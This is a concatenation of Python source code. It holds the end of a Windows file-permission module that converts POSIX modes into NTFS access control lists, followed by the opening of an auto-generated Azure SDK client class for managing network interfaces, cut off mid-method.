security = win32security.GetFileSecurity(path, win32security.DACL_SECURITY_INFORMATION)
dacl = security.GetSecurityDescriptorDacl()
mode = dacl.GetEffectiveRightsFromAcl({
'TrusteeForm': win32security.TRUSTEE_IS_SID,
'TrusteeType': win32security.TRUSTEE_IS_USER,
'Identifier': _get_current_user(),
})
return mode & ntsecuritycon.FILE_GENERIC_EXECUTE == ntsecuritycon.FILE_GENERIC_EXECUTE
def _apply_win_mode(file_path, mode):
"""
This function converts the given POSIX mode into a Windows ACL list, and applies it to the
file given its path. If the given path is a symbolic link, it will resolved to apply the
mode on the targeted file.
"""
file_path = realpath(file_path)
# Get owner sid of the file
security = win32security.GetFileSecurity(file_path, win32security.OWNER_SECURITY_INFORMATION)
user = security.GetSecurityDescriptorOwner()
# New DACL, that will overwrite existing one (including inherited permissions)
dacl = _generate_dacl(user, mode)
# Apply the new DACL
security.SetSecurityDescriptorDacl(1, dacl, 0)
win32security.SetFileSecurity(file_path, win32security.DACL_SECURITY_INFORMATION, security)
def _generate_dacl(user_sid, mode, mask=None):
if mask:
mode = mode & (0o777 - mask)
analysis = _analyze_mode(mode)
# Get standard accounts from "well-known" sid
# See the list here:
# https://support.microsoft.com/en-us/help/243330/well-known-security-identifiers-in-windows-operating-systems
system = win32security.ConvertStringSidToSid('S-1-5-18')
admins = win32security.ConvertStringSidToSid('S-1-5-32-544')
everyone = win32security.ConvertStringSidToSid('S-1-1-0')
# New dacl, without inherited permissions
dacl = win32security.ACL()
# If user is already system or admins, any ACE defined here would be superseded by
# the full control ACE that will be added after.
if user_sid not in [system, admins]:
# Handle user rights
user_flags = _generate_windows_flags(analysis['user'])
if user_flags:
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, user_flags, user_sid)
# Handle everybody rights
everybody_flags = _generate_windows_flags(analysis['all'])
if everybody_flags:
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, everybody_flags, everyone)
# Handle administrator rights
full_permissions = _generate_windows_flags({'read': True, 'write': True, 'execute': True})
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, full_permissions, system)
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, full_permissions, admins)
return dacl
def _analyze_mode(mode):
return {
'user': {
'read': mode & stat.S_IRUSR,
'write': mode & stat.S_IWUSR,
'execute': mode & stat.S_IXUSR,
},
'all': {
'read': mode & stat.S_IROTH,
'write': mode & stat.S_IWOTH,
'execute': mode & stat.S_IXOTH,
},
}
def _copy_win_ownership(src, dst):
# Resolve symbolic links
src = realpath(src)
security_src = win32security.GetFileSecurity(src, win32security.OWNER_SECURITY_INFORMATION)
user_src = security_src.GetSecurityDescriptorOwner()
security_dst = win32security.GetFileSecurity(dst, win32security.OWNER_SECURITY_INFORMATION)
# Second parameter indicates, if `False`, that the owner of the file is not provided by some
# default mechanism, but is explicitly set instead. This is obviously what we are doing here.
security_dst.SetSecurityDescriptorOwner(user_src, False)
win32security.SetFileSecurity(dst, win32security.OWNER_SECURITY_INFORMATION, security_dst)
def _copy_win_mode(src, dst):
# Resolve symbolic links
src = realpath(src)
# Copy the DACL from src to dst.
security_src = win32security.GetFileSecurity(src, win32security.DACL_SECURITY_INFORMATION)
dacl = security_src.GetSecurityDescriptorDacl()
security_dst = win32security.GetFileSecurity(dst, win32security.DACL_SECURITY_INFORMATION)
security_dst.SetSecurityDescriptorDacl(1, dacl, 0)
win32security.SetFileSecurity(dst, win32security.DACL_SECURITY_INFORMATION, security_dst)
def _generate_windows_flags(rights_desc):
# Some notes about how each POSIX right is interpreted.
#
# For the rights read and execute, we have a pretty bijective relation between
# POSIX flags and their generic counterparts on Windows, so we use them directly
# (respectively ntsecuritycon.FILE_GENERIC_READ and ntsecuritycon.FILE_GENERIC_EXECUTE).
#
# But ntsecuritycon.FILE_GENERIC_WRITE does not correspond to what one could expect from a
# write access on Linux: for Windows, FILE_GENERIC_WRITE does not include delete, move or
# rename. This is something that requires ntsecuritycon.FILE_ALL_ACCESS.
# So to reproduce the write right as POSIX, we will apply ntsecuritycon.FILE_ALL_ACCESS
# subtracted of the rights corresponding to POSIX read and POSIX execute.
#
# Finally, having read + write + execute gives a ntsecuritycon.FILE_ALL_ACCESS,
# so a "Full Control" on the file.
#
# A complete list of the rights defined on NTFS can be found here:
# https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)#permissions-for-files-and-folders
flag = 0
if rights_desc['read']:
flag = flag | ntsecuritycon.FILE_GENERIC_READ
if rights_desc['write']:
flag = flag | (ntsecuritycon.FILE_ALL_ACCESS
^ ntsecuritycon.FILE_GENERIC_READ
^ ntsecuritycon.FILE_GENERIC_EXECUTE)
if rights_desc['execute']:
flag = flag | ntsecuritycon.FILE_GENERIC_EXECUTE
return flag
def _check_win_mode(file_path, mode):
# Resolve symbolic links
file_path = realpath(file_path)
# Get current dacl file
security = win32security.GetFileSecurity(file_path, win32security.OWNER_SECURITY_INFORMATION
| win32security.DACL_SECURITY_INFORMATION)
dacl = security.GetSecurityDescriptorDacl()
# Get current file owner sid
user = security.GetSecurityDescriptorOwner()
if not dacl:
# No DACL means full control to everyone
# This is not a deterministic permissions set.
return False
# Calculate the target dacl
ref_dacl = _generate_dacl(user, mode)
return _compare_dacls(dacl, ref_dacl)
def _compare_dacls(dacl1, dacl2):
"""
This method compare the two given DACLs to check if they are identical.
Identical means here that they contains the same set of ACEs in the same order.
"""
return ([dacl1.GetAce(index) for index in range(dacl1.GetAceCount())] ==
[dacl2.GetAce(index) for index in range(dacl2.GetAceCount())])
def _get_current_user():
"""
Return the pySID corresponding to the current user.
"""
# We craft the account_name ourselves instead of calling for instance win32api.GetUserNameEx,
# because this function returns nonsense values when Certbot is run under NT AUTHORITY\SYSTEM.
# To run Certbot under NT AUTHORITY\SYSTEM, you can open a shell using the instructions here:
# https://blogs.technet.microsoft.com/ben_parker/2010/10/27/how-do-i-run-powershell-execommand-prompt-as-the-localsystem-account-on-windows-7/
account_name = r"{0}\{1}".format(win32api.GetDomainName(), win32api.GetUserName())
# LookupAccountName() expects the system name as first parameter. By passing None to it,
# we instruct Windows to first search the matching account in the machine local accounts,
# then into the primary domain accounts, if the machine has joined a domain, then finally
# into the trusted domains accounts. This is the preferred lookup mechanism to use in Windows
# if there is no reason to use a specific lookup mechanism.
# See https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-lookupaccountnamea
return win32security.LookupAccountName(None, account_name)[0]
|
py | 7df7e0c5a5abcf9bbc4b54f7587a74cbc1637e2a | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations(object):
"""NetworkInterfacesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_01_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_01_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.NetworkInterface"
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.NetworkInterface"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Creates or updates a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to the create or update network interface operation.
:type parameters: ~azure.mgmt.network.v2018_01_01.models.NetworkInterface
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def _update_tags_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Updates a network interface tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to update network interface tags.
:type parameters: ~azure.mgmt.network.v2018_01_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def _get_effective_route_table_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.EffectiveRouteListResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveRouteListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self._get_effective_route_table_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
def begin_get_effective_route_table(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Gets all route tables applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either EffectiveRouteListResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.EffectiveRouteListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveRouteListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
def _list_effective_network_security_groups_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.EffectiveNetworkSecurityGroupListResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveNetworkSecurityGroupListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self._list_effective_network_security_groups_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
